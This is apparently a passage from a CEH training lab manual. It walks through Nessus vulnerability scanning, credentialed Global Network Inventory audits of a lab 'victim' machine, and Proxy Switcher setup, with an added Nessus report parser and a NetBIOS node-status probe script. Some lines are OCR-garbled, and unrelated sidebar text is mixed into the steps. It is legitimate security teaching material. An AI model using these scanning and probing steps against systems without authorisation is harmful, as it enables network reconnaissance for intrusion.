FIGURE 10.21: Nessus fetching the newest plugin set
28. The Nessus Log In page appears. Enter the Username and Password given at the time of registration and click Log In.
FIGURE 10.22: The Nessus Log In screen
29. The Nessus HomeFeed window appears. Click OK.
TASK 2: Network Scan Vulnerabilities
For the item SSH user name, enter the name of the account that is dedicated to Nessus on each of the scan target systems.
Screenshot: Nessus HomeFeed notice. The HomeFeed is for home use only; using Nessus at a business or organization requires a ProfessionalFeed subscription. Tenable Network Security, Inc. [OK]
FIGURE 10.23: Nessus HomeFeed subscription
30. After you successfully log in, the Nessus Daemon window appears as shown in the following screenshot.
FIGURE 10.24: The Nessus main screen
31. If you have an Administrator Role, you can see the Users tab, which lists all Users, their Roles, and their Last Logins.
To add a new policy, click Policies -> Add Policy.
New policies are configured using the Credentials tab.
FIGURE 10.25: The Nessus administrator view
32. To add a new policy, click Policies -> Add Policy. Fill in the General policy sections, namely, Basic, Scan, Network Congestion, Port Scanners, Port Scan Options, and Performance.
WARNING: Any changes to the Nessus scanner configuration will affect ALL Nessus users. Edit these options carefully.
FIGURE 10.26: Adding Policies
33. To configure the credentials of the new policy, click the Credentials tab shown in the left pane of Add Policy.
m The most effective credentials scans are those for which the supplied credentials have root privileges.
FIGURE 10.27: Adding Policies and setting Credentials
34. To select the required plugins, click the Plugins tab in the left pane of Add Policy.
Screenshot: Add Policy, Plugins tab. The left list shows plugin families (for example General, HP-UX Local Security Checks, Juniper Local Security Checks); selecting a family lists its individual plugins, and selecting a plugin shows its synopsis and the TCP ports it probes.
If you are using Kerberos, you must configure the Nessus scanner to authenticate to a KDC.
FIGURE 10.28: Adding Policies and selecting Plugins
35. To configure preferences, click the Preferences tab in the left pane of Add Policy.
36. In the Plugin field, select Database settings from the drop-down list.
37. Enter the Login details given at the time of registration.
38. Give the Database SID: 4587, Database port to use: 124, and select Oracle auth type: SYSDBA.
39. Click Submit.
If the policy is successfully added, the Nessus server displays a confirmation message.
Note: SYSDBA is the most privileged Oracle authentication mode, and the policy stores these credentials on the scanner. Use an account dedicated to Nessus for this, and restrict who can view or export the policy.
FIGURE 10.29: Adding Policies and setting Preferences
40. The message Policy "NetworkScan_Policy" was successfully added is displayed, as shown in the following figure.
FIGURE 10.30: The NetworkScan Policy
41. Now, click Scans -> Add to open the Add Scan window.
42. Fill in the fields Name, Type, Policy, and Scan Targets.
43. In Scan Targets, enter the IP address of your network; in this lab we are scanning 10.0.0.2.
44. Click Launch Scan at the bottom-right of the window.
Note: The IP addresses may differ in your lab environment.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
In the Add Scan window, fill in the Name, Type, Policy and Scan Targets fields, or upload a Targets File.
Nessus has the ability to save configured scan policies, network targets, and reports as a .nessus file.
FIGURE 10.31: Add Scan
45. The scan launches and starts scanning the network.
FIGURE 10.32: Scanning in progress
46. After the scan is complete, click the Reports tab.
FIGURE 10.33: Nessus Reports tab
47. Double-click Local Network to view the detailed scan report.
Screenshot: Nessus report for the scanned target, listing each finding with its severity, plugin name, and the port and protocol on which it was found.
FIGURE 10.34: Report of the scanned target
48. Double-click any result to display a more detailed synopsis, description, security level, and solution.
FIGURE 10.35: Report of a scanned target
49. Click the Download Report button in the left pane.
50. You can download the available reports with a .nessus extension from the drop-down list.
Screenshot: Download Report dialog with a Download Format drop-down, a Chapters section (Chapter Selection Not Allowed for the .nessus format), and Cancel and Submit buttons.
If you are manually creating "nessusrc" files, there are several parameters that can be configured to specify SSH authentications.
FIGURE 10.36: Download Report with .nessus extension
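Once the .nessus file is downloaded, the findings can be processed outside the GUI, which is what the Lab Analysis step ("document all the results") usually comes down to. The following Python script is an added example, not part of the lab manual or of Nessus itself: it parses the Nessus v2 XML format (NessusClientData_v2 / Report / ReportHost / ReportItem) and summarizes the findings per host by severity, listing the Medium-and-above items with their solution text. The embedded report is constructed for this example; its host, plugin IDs (9000xx) and plugin names are placeholders, not real Nessus plugins or results from this lab.

```python
"""Summarize a Nessus v2 (.nessus) XML report: per-host finding counts by
severity, plus the non-informational findings with their solutions.
The sample report below is constructed for this example; plugin IDs, names
and the host are placeholders, not real Nessus plugins or lab results."""
import xml.etree.ElementTree as ET
from collections import Counter

# Nessus v2 'severity' attribute values.
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample in the .nessus v2 layout (placeholder data).
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="Local Network">
    <ReportHost name="10.0.0.2">
      <HostProperties>
        <tag name="host-ip">10.0.0.2</tag>
        <tag name="operating-system">Microsoft Windows Server 2008</tag>
      </HostProperties>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="900001" pluginName="Constructed: OS fingerprint"
                  pluginFamily="General">
        <synopsis>The remote operating system was identified.</synopsis>
        <solution>n/a</solution>
      </ReportItem>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
                  pluginID="900002" pluginName="Constructed: SMB signing not enforced"
                  pluginFamily="Windows">
        <synopsis>The remote SMB server does not require message signing.</synopsis>
        <solution>Enforce message signing in the host's configuration.</solution>
      </ReportItem>
      <ReportItem port="1521" svc_name="oracle_tnslsnr" protocol="tcp" severity="3"
                  pluginID="900003" pluginName="Constructed: database default credentials"
                  pluginFamily="Databases">
        <synopsis>The database accepts a default account.</synopsis>
        <solution>Change or lock the default account.</solution>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return {host_ip: {"os": str, "findings": [finding dicts]}} from .nessus XML."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.iter("ReportHost"):
        # HostProperties/tag elements carry host-level facts (IP, OS, ...).
        props = {t.get("name"): (t.text or "") for t in host.iter("tag")}
        ip = props.get("host-ip", host.get("name"))
        findings = []
        for item in host.iter("ReportItem"):
            findings.append({
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "service": item.get("svc_name"),
                "severity": int(item.get("severity")),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName"),
                "synopsis": (item.findtext("synopsis") or "").strip(),
                "solution": (item.findtext("solution") or "").strip(),
            })
        hosts[ip] = {"os": props.get("operating-system", "unknown"),
                     "findings": findings}
    return hosts


def severity_counts(hosts):
    """Per-host Counter of severity names, e.g. {'10.0.0.2': Counter({'High': 1, ...})}."""
    return {ip: Counter(SEVERITY_NAMES[f["severity"]] for f in data["findings"])
            for ip, data in hosts.items()}


def actionable_findings(hosts, min_severity=2):
    """(ip, finding) pairs at or above min_severity (default Medium), most severe first."""
    rows = [(ip, f) for ip, d in hosts.items()
            for f in d["findings"] if f["severity"] >= min_severity]
    return sorted(rows, key=lambda r: (-r[1]["severity"], r[0], r[1]["port"]))


if __name__ == "__main__":
    hosts = parse_nessus(SAMPLE_NESSUS)  # replace with open(path).read() for a real export
    for ip, counts in severity_counts(hosts).items():
        print(ip, hosts[ip]["os"], dict(counts))
    for ip, f in actionable_findings(hosts):
        print(f"{SEVERITY_NAMES[f['severity']]:8} {ip}:{f['port']}/{f['protocol']} "
              f"{f['name']} -> {f['solution']}")
```

To run it against a real export, replace SAMPLE_NESSUS with the file contents; the per-finding severity comes from the ReportItem severity attribute (0 Info through 4 Critical), which is the same scale the Nessus GUI shows in the report view.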
51. Now, click Log out.
52. In the Nessus Server Manager, click Stop Nessus Server.
FIGURE 10.37: Log out Nessus
Lab Analysis
Document all the results and reports gathered during the lab.
To stop the Nessus server, go to the Nessus Server Manager and click the Stop Nessus Server button.
Tool/Utility: Nessus
Information Collected/Objectives Achieved:
■ Scan Target Machine: Local Host
■ Performed Scan Policy: NetworkScan_Policy
■ Target IP Address: 10.0.0.2
■ Result: Local Host vulnerabilities
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Evaluate the OS platforms that Nessus has builds for. Evaluate whether Nessus works with SecurityCenter.
2. Determine how the Nessus license works in a VM (Virtual Machine) environment.
Internet Connection Required
☑ Yes   ☐ No
Platform Supported
☑ Classroom   ☐ iLabs
Auditing Scanning by using Global Network Inventory
Global Network Inventory is used as an audit scanner in zero deployment and agent-free environments. It scans computers by IP range, domain, computers or single computers, defined by the Global Network Inventory host file.
Lab Scenario
With the development of network technologies and applications, network attacks are greatly increasing both in number and severity. Attackers always look for service vulnerabilities and application vulnerabilities on a network or its servers. If an attacker finds a flaw or loophole in a service run over the Internet, the attacker will immediately use it to compromise the entire system and any other data found, and from there can compromise other systems on the network. Similarly, if the attacker finds a workstation with administrative privileges and faults in that workstation's applications, they can execute arbitrary code or implant viruses to intensify the damage to the network.
As a key technique in the network security domain, intrusion detection systems (IDSes) play a vital role in detecting various kinds of attacks and securing networks. So, as an administrator you should make sure that services do not run as the root user, and should keep up with patches and updates for applications from vendors and with advisories from security organizations such as CERT and the CVE list. Safeguards can be implemented so that email client software does not automatically open or execute attachments. In this lab, you will learn how networks are scanned using the Global Network Inventory tool.
Lab Objectives
This lab will show you how networks can be scanned and how to use Global Network Inventory. It will teach you how to:
■ Use the Global Network Inventory tool
Lab Environment
To carry out the lab, you need:
■ Global Network Inventory tool located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Global Network Inventory Scanner
■ You can also download the latest version of Global Network Inventory from this link: http://www.magnetosoft.com/products/globalnetworkinventory/gnifeatures.htm/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as attacker (host machine)
■ Another computer running Windows Server 2008 as victim (virtual machine)
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Global Network Inventory
■ Administrative privileges to run tools
Lab Duration
Time: 20 Minutes
Overview of Global Network Inventory
Global Network Inventory is an agentless inventory and security auditing scanner: it connects to each target with the credentials supplied in the Audit Wizard and collects hardware, operating system, installed software, hotfix, service, user group and logged-on user details for computers selected by IP range, domain, host file or single address. Unlike a port scanner such as nmap or hping, it does not probe ports or perform idle scanning; its results depend on having valid administrative credentials for the targets.
Lab Tasks
TASK 1: Scanning the network
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 11.1: Windows Server 2012 - Desktop view
2. Click the Global Network Inventory app to open the Global Network Inventory window.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file.
FIGURE 11.2: Windows Server 2012 - Apps
3. The Global Network Inventory main window appears as shown in the following figure.
4. The Tip of the Day window also appears; click Close.
Scan only items that you need by customizing scan elements.
5. Turn on the Windows Server 2008 virtual machine from Hyper-V Manager.
FIGURE 11.3: Global Network Inventory Main Window
FIGURE 11.4: Windows 2008 Virtual Machine
6. Now switch back to the Windows Server 2012 machine; a New Audit Wizard window appears. Click Next (or, in the toolbar, select the Scan tab and click Launch audit wizard).
Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices.
View scan results, including historic results for all scans, individual machines, or a selected number of addresses.
7. Select IP range scan and then click Next in the Audit Scan Mode wizard.
Screenshot: New Audit Wizard, Welcome to the New Audit Wizard. "This wizard will guide you through the process of creating a new inventory audit. To continue, click Next." [< Back] [Next >] [Cancel]
FIGURE 11.5: Global Network Inventory new audit wizard
Screenshot: New Audit Wizard, Audit Scan Mode. "To start a new audit scan you must choose the scenario that best fits how you will be using this scan."
○ Single address scan: Choose this mode if you want to audit a single computer
● IP range scan: Choose this mode if you want to audit a group of computers within a single IP range
○ Domain scan: Choose this mode if you want to audit computers that are part of the same domain(s)
○ Host file scan: Choose this mode to audit computers specified in the host file. The most common scenario is to audit a group of computers without auditing an IP range or a domain
○ Export audit agent: Choose this mode if you want to audit computers using a domain login script. An audit agent will be exported to a shared directory. It can later be used in the domain login script.
To continue, click Next. [< Back] [Next >] [Cancel]
FIGURE 11.6: Global Network Inventory Audit Scan Mode
8. Set an IP range to scan and then click Next in the IP Range Scan wizard.
9. In the Authentication Settings wizard, select Connect as, fill in the respective credentials of your Windows Server 2008 virtual machine, and click Next.
Fully customizable layouts and color schemes on all views and reports.
Export data to HTML, XML, Microsoft Excel, and text formats.
Licenses are network-based rather than user-based. In addition, extra licenses to cover additional addresses can be purchased at any time if required.
The program comes with dozens of customizable reports. New reports can be easily added through the user interface.
10. Leave the settings as default and click Finish to complete the wizard.
Ability to generate reports on schedule after every scan, daily, weekly, or monthly.
To configure reports choose Reports | Configure reports from the main menu and select a report from the tree control on the left. Each report can be configured independently.
11. The Scan progress window displays the scanning progress.
Screenshot: New Audit Wizard, Completing the New Audit Wizard. "You are ready to start a new IP range scan. You can set the following options for this scan:" ☑ Do not record unavailable nodes; ☑ Open scan progress dialog when scan starts; ☐ Rescan nodes that have been successfully scanned; ☐ Rescan, but no more than once a day. "To complete this wizard, click Finish." [< Back] [Finish] [Cancel]
FIGURE 11.9: Global Network Inventory final Audit wizard
Screenshot: New Audit Wizard, Authentication Settings. "Specify the authentication settings to use to connect to a remote computer." ○ Connect as currently logged on user; ● Connect as: Domain\User name [administrator account of the Windows Server 2008 virtual machine], Password [********]. "To continue, click Next." [< Back] [Next >] [Cancel]
FIGURE 11.8: Global Network Inventory Authentication settings
Filtering is a quick way to find a subset of data within a dataset. A filtered grid displays only the nodes that meet the criteria you specified for a column(s).
12. After completion, the scanning results can be viewed as shown in the following figure.
Global Network Inventory lets you change the grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column.
FIGURE 11.11: Global Network Inventory result window
13. Now select the Windows Server 2008 machine from View results to view its individual results.
Screenshot: Global Network Inventory main window (Unregistered) after the scan. The results grid is grouped by domain WORKGROUP (2 computers) and IP address, one row per host with timestamp (8/22/2012), host name, status (Success), MAC address, vendor, OS name and processor; the View results pane lists All addresses > WORKGROUP > 10.0.0.7 (WIN-D39...) and 10.0.0.4 (WIN-ULY8...). The Scan progress dialog lists the 24 addresses of the range from 10.0.0.2 onward with name, percent complete and timestamp; hosts found include WIN-ULY858KHQIP at 10.0.0.4, ADMINPC at 10.0.0.6 and WIN-D39MR5HL9E4 at 10.0.0.7. Options: ☑ Open this dialog when scan starts; ☑ Close this dialog when scan completes; ☑ Don't display completed scans. Elapsed time: 0 min 6 sec; Scanned nodes: 0/24. [Stop] [Close]
FIGURE 11.10: Global Network Inventory Scanning Progress
Screenshot: Global Network Inventory (Unregistered), individual machine results for WIN-D39MR5HL9E4 (10.0.0.7, WORKGROUP, scanned 8/22/2012 3:36:38 PM, status Success, Realtek network adapter, Intel(R) Core(TM) processor).
FIGURE 11.12: Global Network Inventory Individual machine results
14. The Scan summary section gives you a brief summary of the machines that have been scanned.
Screenshot: Global Network Inventory Scan summary tab for WIN-D39MR5HL9E4, with columns Host Name, Status, MAC Address, Vendor, OS Name, Comment and Processor (Total 1 item).
FIGURE 11.13: Global Network Inventory Scan Summary tab
15. The BIOS section gives details of the BIOS settings.
The Global Network Inventory grid color scheme is completely customizable. You can change Global Network Inventory colors by selecting Tools | Grid colors from the main menu and changing colors.
To configure the results history level choose Scan | Results history level from the main menu and set the desired history level.
16. The Memory tab summarizes the memory in your scanned machine.
E-mail address - Specifies the e-mail address that people should use when sending e-mail to you at this account. The e-mail address must be in the format name@company, for example, someone@mycompany.com.
17. In the NetBIOS section, complete details can be viewed.
Screenshot: Global Network Inventory Memory tab for WIN-D39MR5HL9E4 (WORKGROUP, 8/22/2012 3:36:38 PM), with total and available physical and virtual memory columns. Results history depth: Last scan for each address.
FIGURE 11.15: Global Network Inventory Memory tab
Screenshot: Global Network Inventory BIOS tab for the scanned host. Displayed group: All groups; Results history depth: Last scan for each address.
FIGURE 11.14: Global Network Inventory BIOS summary tab
Message subject - Type the subject of your message. Global Network Inventory cannot post a message that does not contain a subject.
FIGURE 11.16: Global Network Inventory NetBIOS tab
18. The User Groups tab shows user account details within the workgroup.
Name - Specifies the friendly name associated with your e-mail address. When you send messages, this name appears in the From box of your outgoing messages.
19. The Logged on tab shows the logged-on accounts of the machine in detail.
Screenshot: Global Network Inventory User groups tab for WIN-D39MR5HL9E4 (5 groups): Administrators (WIN-D39MR5HL9E4\Administrator, user account); Distributed COM Users (WIN-D39MR5HL9E4\Administrator, user account); Guests (WIN-D39MR5HL9E4\Guest, user account); IIS_IUSRS (NT SERVICE\ReportServer, well-known group account); Performance Log Users.
FIGURE 11.17: Global Network Inventory User groups section
Screenshot: Global Network Inventory NetBIOS tab for WIN-D39MR5HL9E4 (3 items): WIN-D39MR5HL9E4 <0x00> Unique, Workstation Service; WIN-D39MR5HL9E4 <0x20> Unique, File Server Service; WORKGROUP <0x00> Group, Domain Name.
& Port ־ Specifies the port number you connect to on your outgoing e- mail (SMTP) server. This port number is usually25.
2 0 . T h e Port connectors s e c t io n s h o w s p o r t s c o n n e c t e d i n d ie n e tw o rk .
Outgoing mail (SMTP) ־ Specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages
2 1 . T h e Service s e c t io n g iv e d ie d e ta i ls o f d ie s e rv ic e s in s ta l le d i n d ie m a c h in e .
[Screenshot: Global Network Inventory Port connectors tab for host WIN-D39MR5HL9E4 (domain WORKGROUP, scanned 8/22/2012), 25 items including Serial Port 16550A Compatible (DB-9 male), Keyboard Port PS/2, Mouse Port PS/2 and several USB connectors]
FIGURE 11.19: Global Network Inventory Port connectors tab
[Screenshot: Global Network Inventory Logged on tab for host WIN-D39MR5HL9E4, listing the service accounts NT SERVICE\MsDtsServer110, NT SERVICE\MSSQLFDLauncher, NT SERVICE\MSSQLSERVER, NT SERVICE\MSSQLServerOLAPService and NT SERVICE\ReportServer, and the interactive user WIN-D39MR5HL9E4\Administrator, logged on 8/22/12 09:01:20]

FIGURE 11.18: Global Network Inventory Logged on section
[Screenshot: Global Network Inventory Services tab for host WIN-D39MR5HL9E4 (147 services). Each row gives the service name, startup type (Automatic or Manual), state (Running or Stopped) and executable path; the visible rows include Adobe Acrobat Update Service, Application Experience, Application Host Helper Service, Application Identity, Application Information, Application Layer Gateway Service and Application Management, most of them hosted by C:\Windows\system32\svchost.exe with a -k service group]

FIGURE 11.20: Global Network Inventory Services section
22. The Network Adapters section shows the Adapter IP and Adapter type of each scanned host.

To create a new custom report that includes more than one scan element, choose Reports | Configure reports from the main menu, click the Add button in the Reports dialog, customize the settings as desired, and click OK.
[Screenshot: Global Network Inventory Network adapters tab listing, for each scanned host, the Ethernet adapter with its MAC address, IP address, subnet mask and vendor]

A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory uses a blank password; set one before leaving the tool on a shared workstation, because the saved results contain the account names, services and addresses of every host you scanned.
FIGURE 11.21: Global Network Inventory Network Adapter tab
Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: Global Network Inventory

Information Collected/Objectives Achieved:

IP Scan Range: 10.0.0.1 - 10.0.0.50

Scanned IP Addresses: 10.0.0.7, 10.0.0.4

Result:
■ Scan summary
■ BIOS
■ Memory
■ NetBIOS
■ User groups
■ Logged on
■ Port connectors
■ Services
■ Network adapters
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Can Global Network Inventory audit remote computers and network appliances, and if yes, how?

2. How can you export the Global Network Inventory agent to a shared network directory?

Internet Connection Required

□ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs
Anonymous Browsing using Proxy Switcher

Proxy Switcher allows you to automatically execute actions based on the detected network connection.
Lab Scenario

In the previous lab, you gathered information like the scan summary, NetBIOS details, services running on a computer, etc. using Global Network Inventory. NetBIOS provides programs with a uniform set of commands for requesting the lower-level services that the programs must have to manage names, conduct sessions, and send datagrams between nodes on a network. A vulnerability has been identified in Microsoft Windows that involves one of the NetBIOS over TCP/IP (NetBT) services, the NetBIOS Name Server (NBNS). With this service, the attacker can find a computer's IP address by using its NetBIOS name, and vice versa. The response to a NetBT name service query may contain random data from the destination computer's memory; an attacker could seek to exploit this vulnerability by sending the destination computer a NetBT name service query and then looking carefully at the response to determine whether any random data from that computer's memory is included.

As an expert penetration tester, you should follow typical security practices: to block such Internet-based attacks, block UDP port 137 at the firewall. You must also understand how networks are scanned using Proxy Switcher.
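The query and response the scenario describes can be made concrete. The following is an added example, not code from the CEH manual and not Global Network Inventory's implementation: it builds the node-status request that nbtstat -A sends to UDP port 137, parses a reply into the name table the NetBIOS tab displayed (name, suffix, unique or group, service), and counts any bytes the reply carries beyond the structure its own header fields describe, which is where data the sender never meant to disclose would sit. The reply it parses is constructed to match the WIN-D39MR5HL9E4 and WORKGROUP entries from the scan; the MAC address and transaction ID are invented.

```python
"""NetBIOS node-status (NBSTAT) query builder and reply parser.

Added example for this lab; not code from the CEH manual or Global Network
Inventory. The reply is CONSTRUCTED to mirror the scan's NetBIOS tab
(WIN-D39MR5HL9E4 <00>/<20>, WORKGROUP <00>); MAC and transaction ID are
made up. Live use: send build_nbstat_query() to UDP/137 of a host you are
authorised to test and pass the received datagram to parse_nbstat_reply().
"""
import struct

NBSTAT = 0x0021      # RR type of the node status request/response
CLASS_IN = 0x0001
STATS_LEN = 46       # MAC address (6 bytes) + 40 bytes of node statistics

# Suffix byte -> service as Global Network Inventory labels it; unique and
# group names with the same suffix mean different things.
SUFFIX_UNIQUE = {0x00: "Workstation Service", 0x03: "Messenger Service",
                 0x1B: "Domain Master Browser", 0x1D: "Master Browser",
                 0x20: "File Server Service"}
SUFFIX_GROUP = {0x00: "Domain Name", 0x1C: "Domain Controllers",
                0x1E: "Browser Service Elections"}


def encode_name(name: str, suffix: int = 0x00) -> bytes:
    """RFC 1001 first-level encoding: 15 name bytes plus the suffix, each
    byte split into two nibbles written as the letters 'A'..'P'."""
    if name == "*":                                   # NBSTAT wildcard, NUL padded
        raw = b"*" + b"\x00" * 15
    else:
        raw = name.upper().ljust(15).encode("ascii") + bytes([suffix])
    nibbles = bytes(c for b in raw for c in ((b >> 4) + 0x41, (b & 0x0F) + 0x41))
    return bytes([len(nibbles)]) + nibbles + b"\x00"  # label length, 32 letters, root


def build_nbstat_query(txid: int = 0x1234) -> bytes:
    """The 50-byte datagram nbtstat -A sends: QDCOUNT=1, '*' name, NBSTAT, IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*") + struct.pack(">HH", NBSTAT, CLASS_IN)


def build_nbstat_reply(txid, names, mac, extra=b""):
    """CONSTRUCTED reply for offline testing. names: (name, suffix, is_group).
    `extra` pads RDATA beyond the defined layout, as a leaky stack might."""
    rdata = bytes([len(names)])
    for name, suffix, is_group in names:
        flags = 0x0400 | (0x8000 if is_group else 0)  # ACT bit, B-node, GROUP bit
        rdata += name.upper().ljust(15).encode("ascii") + bytes([suffix])
        rdata += struct.pack(">H", flags)
    rdata += mac + b"\x00" * (STATS_LEN - 6) + extra
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)  # QR=1, AA=1, ANCOUNT=1
    rr = encode_name("*") + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, len(rdata))
    return header + rr + rdata


def parse_nbstat_reply(data: bytes, expected_txid=None) -> dict:
    """Decode names and MAC, and count bytes the layout does not account for
    (RDLENGTH beyond the records it describes, or bytes after the RR). A name
    service reply should carry nothing beyond the node status structure."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not an NBSTAT response")
    if expected_txid is not None and txid != expected_txid:
        raise ValueError("transaction ID mismatch")   # reject spoofed replies
    off = 12
    for _ in range(qdcount):                # skip echoed questions, if any
        off += 1 + data[off] + 1 + 4
    off += 1 + data[off] + 1                # answer name: one label plus root label
    rtype, _, _ttl, rdlen = struct.unpack_from(">HHIH", data, off)
    off += 10
    if rtype != NBSTAT:
        raise ValueError(f"unexpected RR type {rtype:#06x}")
    rdata = data[off:off + rdlen]
    count = rdata[0]
    stats_off = 1 + 18 * count
    if len(rdata) < stats_off + STATS_LEN:
        raise ValueError("truncated node status record")
    names = []
    for i in range(count):
        entry = rdata[1 + 18 * i:19 + 18 * i]
        suffix, nflags = entry[15], struct.unpack(">H", entry[16:18])[0]
        is_group = bool(nflags & 0x8000)
        names.append({
            "name": entry[:15].rstrip(b" \x00").decode("ascii", "replace"),
            "suffix": suffix, "group": is_group,
            "node_type": "BPMH"[(nflags >> 13) & 0x3],
            "service": (SUFFIX_GROUP if is_group else SUFFIX_UNIQUE).get(suffix, "Unknown"),
        })
    mac = rdata[stats_off:stats_off + 6]
    unaccounted = (rdlen - (stats_off + STATS_LEN)) + max(0, len(data) - (off + rdlen))
    return {"txid": txid, "names": names,
            "mac": ":".join(f"{b:02X}" for b in mac),
            "unaccounted_bytes": unaccounted}


SAMPLE_MAC = bytes.fromhex("14BED9C0FFEE")          # made up
SAMPLE_REPLY = build_nbstat_reply(0x1234, [
    ("WIN-D39MR5HL9E4", 0x00, False), ("WIN-D39MR5HL9E4", 0x20, False),
    ("WORKGROUP", 0x00, True)], SAMPLE_MAC)
LEAKY_REPLY = SAMPLE_REPLY + b"\x7f\x3a\x9c\x11"   # four bytes no field accounts for

if __name__ == "__main__":
    for n in parse_nbstat_reply(SAMPLE_REPLY, 0x1234)["names"]:
        print(f"{n['name']:<15} <{n['suffix']:02X}> {'GROUP' if n['group'] else 'UNIQUE'} {n['service']}")
    print("unaccounted bytes:", parse_nbstat_reply(LEAKY_REPLY, 0x1234)["unaccounted_bytes"])
```

Run it against a live host only with authorisation. With UDP 137 filtered at the firewall, as the scenario recommends, the query simply times out, which is the result you want to see from outside the perimeter.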
Lab Objectives

This lab will show you how networks can be scanned and how to use Proxy Switcher. It will teach you how to:

■ Hide your IP address from the websites you visit

■ Switch proxy servers for improved anonymous surfing
Lab Environment

To carry out the lab, you need:

■ Proxy Switcher, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher

■ You can also download the latest version of Proxy Switcher from this link: http://www.proxyswitcher.com/

■ If you decide to download the latest version, then the screenshots shown in the lab might differ

■ A computer running Windows Server 2012

■ A web browser with Internet access

■ Follow the wizard-driven installation steps to install Proxy Switcher

■ Administrative privileges to run tools
Lab Duration

Time: 15 Minutes

Overview of Proxy Switcher

Proxy Switcher allows you to automatically execute actions based on the detected network connection. As the name indicates, Proxy Switcher comes with some default actions, for example setting the proxy settings for Internet Explorer, Firefox, and Opera.
Lab Tasks

1. Install Proxy Switcher in Windows Server 2012 (host machine).

2. Proxy Switcher is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher

3. Follow the wizard-driven installation steps and install it on all platforms of the Windows operating system.

4. This lab will work in the CEH lab environment on Windows Server 2012, Windows Server 2008 and Windows 7.

5. Open the Firefox browser in your Windows Server 2012, go to Tools, and click Options in the menu bar.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Automatic change of proxy configurations (or any other action) based on network information.
[Screenshot: Firefox showing the Google home page with the Tools menu open (Downloads, Add-ons, Web Developer, Page Info, Clear Recent History, Options)]

FIGURE 12.1: Firefox Options tab
6. Go to the Advanced panel in the Firefox Options dialog, select the Network tab, and then click Settings.
[Screenshot: Firefox Options dialog, Advanced panel (tabs: General, Network, Update, Encryption). The Network tab shows Connection: "Configure how Firefox connects to the Internet" with a Settings... button; Cached Web Content: "Your web content cache is currently using 8.7 MB of disk space", Clear Now, "Override automatic cache management", "Limit cache to 1024 MB of space"; Offline Web Content and User Data: "Your application cache is currently using 0 bytes of disk space", "Tell me when a website asks to store data for offline use", and the list of websites allowed to store data for offline use with an Exceptions... button]

FIGURE 12.2: Firefox Network Settings
7. Select the Use system proxy settings radio button, and click OK.

Often different Internet connections require completely different proxy server settings, and it is a real pain to change them manually.

Proxy Switcher is fully compatible with Internet Explorer, Firefox, Opera and other programs.
[Screenshot: Firefox Connection Settings dialog ("Configure Proxies to Access the Internet"). Options: No proxy; Auto-detect proxy settings for this network; Use system proxy settings (selected); Manual proxy configuration with HTTP Proxy 127.0.0.1, "Use this proxy server for all protocols", SSL Proxy 127.0.0.1, FTP Proxy 127.0.0.1, SOCKS Host 127.0.0.1, SOCKS v4 / SOCKS v5 (v5 selected), and "No Proxy for: localhost, 127.0.0.1" (Example: .mozilla.org, .net.nz, 192.168.1.0/24); Automatic proxy configuration URL]

Proxy Switcher supports the following command line options: -d: activate direct connection.

FIGURE 12.3: Firefox Connection Settings
8. Now, to install Proxy Switcher Standard, follow the wizard-driven installation steps.

9. To launch Proxy Switcher Standard, go to the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 12.4: Windows Server 2012 - Desktop view

TASK 1: Proxy Servers Downloading

10. Click the Proxy Switcher Standard app to open the Proxy Switcher window, or click Proxy Switcher in the tray icon list.
[Screenshot: Windows Server 2012 Start screen for the Administrator account, showing the installed apps, among them Server Manager, Windows PowerShell, Google Chrome, Hyper-V Manager, Global Network Inventory, Computer, Control Panel, Command Prompt, Mozilla Firefox, Proxy Switcher Standard and ProxyChecker]

FIGURE 12.5: Windows Server 2012 - Apps

[Screenshot: Windows Server 2012 Datacenter (build 8400) notification area with the Proxy Switcher tray icon selected]

FIGURE 12.6: Select Proxy Switcher
11. The Proxy List Wizard will appear as shown in the following figure; click Next.
Proxy Switcher is free to use without limitations for personal and commercial use.

If the server becomes inaccessible, Proxy Switcher will try to find a working proxy server; a reddish background will be displayed until a working proxy server is found.
Proxy Switcher supports LAN, dialup, VPN and other RAS connections.

12. Select the Find New Servers, Rescan Servers, Recheck Dead radio button under Common Tasks, and click Finish.

Proxy switching from the command line can be used at logon to automatically set connection settings.

